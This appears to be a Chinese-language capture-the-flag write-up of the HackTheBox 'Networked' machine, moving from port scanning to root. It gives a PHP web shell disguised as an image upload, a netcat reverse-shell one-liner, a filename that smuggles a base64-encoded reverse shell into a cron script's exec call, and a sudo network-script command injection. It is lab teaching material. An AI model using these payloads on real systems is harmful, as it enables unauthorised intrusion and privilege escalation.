title: HackTheBox-Networked author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Networked.png tags:
•LInux
Crazy:~/HackThebox/Networked$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.146[sudo] crazyinside 的密码:Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 02:59:55 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 80/tcp on 10.10.10.146Discovered open port 22/tcp on 10.10.10.146Crazy:~/HackThebox/Networked$ sudo nmap -sC -sV 10.10.10.146 -p22,80 -oN NetworkedStarting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 11:02 CSTNmap scan report for 10.10.10.146Host is up (0.17s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey:| 2048 2275d7a74f81a7af5266e52744b1015b (RSA)| 256 2d6328fca299c7d435b9459a4b38f9c8 (ECDSA)|_ 256 73cda05b84107da71c7c611df554cfc4 (ED25519)80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16|_http-title: Site doesn't have a title (text/html; charset=UTF-8).Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.79 secondszsh: segmentation fault sudo nmap -sC -sV 10.10.10.146 -p22,80 -oN Networked
<html><body>Hello mate, we're building the new FaceMash!</br>Help by funding us and be the new Tyler&Cameron!</br>Join us at the pool party this Sat to get a glimpse<!-- upload and gallery not yet linked --></body></html>
Crazy:~/HackThebox/Networked$ dirsearch -u http://10.10.10.146/_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/crazyinside/.dirsearch/reports/10.10.10.146/-_22-08-22_11-03-55.txtError Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_11-03-55.logTarget: http://10.10.10.146/[11:03:55] Starting:[11:04:02] 403 - 216B - /.htaccess.orig[11:04:02] 403 - 216B - /.htaccess.save[11:04:03] 403 - 218B - /.htaccess.sample[11:04:03] 403 - 216B - /.htaccess_orig[11:04:03] 403 - 217B - /.htaccess_extra[11:04:03] 403 - 214B - /.htaccessOLD[11:04:03] 403 - 214B - /.htaccessBAK[11:04:03] 403 - 214B - /.htaccess_sc[11:04:03] 403 - 215B - /.htaccessOLD2[11:04:03] 403 - 216B - /.htaccess.bak1[11:04:03] 403 - 206B - /.htm[11:04:03] 403 - 213B - /.ht_wsr.txt[11:04:03] 403 - 207B - /.html[11:04:03] 403 - 216B - /.htpasswd_test[11:04:03] 403 - 212B - /.htpasswds[11:04:03] 403 - 213B - /.httr-oauth[11:04:33] 301 - 235B - /backup -> http://10.10.10.146/backup/[11:04:33] 200 - 885B - /backup/[11:04:35] 403 - 210B - /cgi-bin/[11:04:48] 200 - 229B - /index.php[11:04:48] 200 - 229B - /index.php/login/[11:05:00] 200 - 1KB - /photos.php[11:05:16] 200 - 169B - /upload.php[11:05:16] 301 - 236B - /uploads -> http://10.10.10.146/uploads/[11:05:16] 200 - 2B - /uploads/
<?phprequire '/var/www/html/lib.php';define("UPLOAD_DIR", "/var/www/html/uploads/");#上传路径if( isset($_POST['submit']) ) {if (!empty($_FILES["myFile"])) {$myFile = $_FILES["myFile"];if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {#文件大小不许大于60000echo '<pre>Invalid image file.</pre>';displayform();}if ($myFile["error"] !== UPLOAD_ERR_OK) {echo "<p>An error occurred.</p>";displayform();exit;}//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];list ($foo,$ext) = getnameUpload($myFile["name"]); #白名单校验$validext = array('.jpg', '.png', '.gif', '.jpeg');$valid = false;foreach ($validext as $vext) {if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {$valid = true;}}if (!($valid)) {echo "<p>Invalid image file</p>";displayform();exit;}$name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;$success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);if (!$success) {echo "<p>Unable to save file.</p>";exit;}echo "<p>file uploaded, refresh gallery</p>";// set proper permissions on the new filechmod(UPLOAD_DIR . $name, 0644);}} else {displayform();}?>
在图片中插入PHP代码:
<?php echo "START<br/><br/>nnn"; system($_GET["cmd"]); echo "nnn<br/><br/>END"; ?>命名为shell.php.png。
右键新建打开,输入cmd=id:
自己apache解析就有问题:
http://10.10.10.146/uploads/10_10_16_3.php.png?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.16.3%201337%20%3E%2Ftmp%2FfCrazy:~/HackThebox/Networked/backup$ nc -lvnp 1337listening on [any] 1337 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.146] 55794sh: no job control in this shellsh-4.2$ ididuid=48(apache) gid=48(apache) groups=48(apache)sh-4.2$ python3 -c 'import pty; pty.spawn("/bin/bash")'python3 -c 'import pty; pty.spawn("/bin/bash")'sh: python3: command not foundsh-4.2$ script -qc /bin/bash /dev/nullscript -qc /bin/bash /dev/nullbash-4.2$ ls10_10_16_3.php.png 127_0_0_2.png 127_0_0_4.png127_0_0_1.png 127_0_0_3.png index.htmlbash-4.2$
bash-4.2$ cd /homebash-4.2$ lsgulybash-4.2$ cd gultbash: cd: gult: No such file or directorybash-4.2$ cd gulybash-4.2$ lscheck_attack.php crontab.guly user.txtbash-4.2$ cat user.txtcat: user.txt: Permission deniedbash-4.2$ cat check_attack.php<?phprequire '/var/www/html/lib.php';$path = '/var/www/html/uploads/';$logpath = '/tmp/attack.log';$to = 'guly';$msg= '';$headers = "X-Mailer: check_attack.phprn";$files = array();$files = preg_grep('/^([^.])/', scandir($path));foreach ($files as $key => $value) {$msg='';if ($value == 'index.html') {continue;}#echo "-------------n";#print "check: $valuen";list ($name,$ext) = getnameCheck($value);$check = check_ip($name,$value);if (!($check[0])) {echo "attack!n";# todo: attach filefile_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);exec("rm -f $logpath");exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");echo "rm -f $path$valuen";mail($to, $msg, $msg, $headers, "-F$value");}}?>bash-4.2$
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");改编一下:
exec("nohup /bin/rm -f /var/www/html/uploads/$value > /dev/null 2>&1 &");主要是这段代码
$check = check_ip($name,$value);if (!($check[0])) {echo "attack!n";# todo: attach filefile_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);exec("rm -f $logpath");exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");echo "rm -f $path$valuen";mail($to, $msg, $msg, $headers, "-F$value");}}
它检测/var/www/html/uploads/下文件是否以正确的IP命名,如果不是会输出attack!,然后调用exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");去删除掉它。我可以照着这条命令把我希望的拼接一下。试了几次反弹shell会话的方法,这个可以用:
exec("nohup /bin/rm -f /var/www/html/uploads/a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh > /dev/null 2>&1 &");然后开始找check_ip函数方法到底是如何检测的,会不会干扰命令正常运行:
function check_ip($prefix,$filename) {//echo "prefix: $prefix - fname: $filename<br>n";$ret = true;if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {$ret = false;$msg = "4tt4ck on file ".$filename.": prefix is not a valid ip ";} else {$msg = $filename;}return array($ret,$msg);}
这个只是检测一下是否为有效IP。那我直接创建一个文件名为a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh。应该可以,我还要确保原本代码能正常执行,否则可能会出现一些意料之外的错误:
bash-4.2$ touch "a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh;b"bash-4.2$ ls10_10_16_3.php.png127_0_0_1.png127_0_0_2.png127_0_0_3.png127_0_0_4.pngtouch "a;echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE2LjMgMTMzOAo= |base64 -d|sh;b"index.htmlbash-4.2$
Crazy:~/HackThebox/Networked/backup$ nc -lvnp 1338listening on [any] 1338 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.146] 44432iduid=1000(guly) gid=1000(guly) groups=1000(guly)python3 -c 'import pty; pty.spawn("/bin/bash")'iduid=1000(guly) gid=1000(guly) groups=1000(guly)lscheck_attack.phpcrontab.gulyuser.txtcat user.txt526cfc2.........................script -qc /bin/bash /dev/null[guly@networked ~]$ lscheck_attack.php crontab.guly user.txt[guly@networked ~]$
[guly@networked ~]$ sudo -lMatching Defaults entries for guly on networked:!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",secure_path=/sbin:/bin:/usr/sbin:/usr/binUser guly may run the following commands on networked:(root) NOPASSWD: /usr/local/sbin/changename.sh[guly@networked ~]$ cat /usr/local/sbin/changename.sh#!/bin/bash -pcat > /etc/sysconfig/network-scripts/ifcfg-guly << EoFDEVICE=guly0ONBOOT=noNM_CONTROLLED=noEoFregexp="^[a-zA-Z0-9_ /-]+$"for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; doecho "interface $var:"read xwhile [[ ! $x =~ $regexp ]]; doecho "wrong input, try again"echo "interface $var:"read xdoneecho $var=$x >> /etc/sysconfig/network-scripts/ifcfg-gulydone/sbin/ifup guly0[guly@networked ~]$
[guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-gulyDEVICE=guly0ONBOOT=noNM_CONTROLLED=noNAME=ps /tmp/fooPROXY_METHOD=asodihBROWSER_ONLY=asdoihBOOTPROTO=asdoih[guly@networked ~]$
[guly@networked ~]$ sudo /usr/local/sbin/changename.shinterface NAME:idinterface PROXY_METHOD:whoamiinterface BROWSER_ONLY:idinterface BOOTPROTO:idERROR : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.[guly@networked ~]$ sudo /usr/local/sbin/changename.shinterface NAME:a idinterface PROXY_METHOD:a whoamiinterface BROWSER_ONLY:a pwdinterface BOOTPROTO:a whoamiuid=0(root) gid=0(root) groups=0(root)root/etc/sysconfig/network-scriptsrootuid=0(root) gid=0(root) groups=0(root)root/etc/sysconfig/network-scriptsrootERROR : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.[guly@networked ~]$ sudo /usr/local/sbin/changename.shinterface NAME:a idinterface PROXY_METHOD:a /bin/bashinterface BROWSER_ONLY:a idinterface BOOTPROTO:a iduid=0(root) gid=0(root) groups=0(root)[root@networked network-scripts]# cat /root/root.txt0a8e................................
原文始发于微信公众号(老鑫安全):HackTheBox-Networked
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论